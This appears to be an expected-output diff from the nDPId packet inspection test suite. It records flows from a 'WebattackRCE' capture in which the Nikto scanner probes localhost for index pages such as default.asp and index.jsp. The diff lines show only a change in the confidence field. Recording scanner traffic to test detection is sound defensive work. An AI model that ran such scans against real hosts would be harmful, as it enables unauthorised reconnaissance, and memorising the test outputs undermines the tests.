00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}} 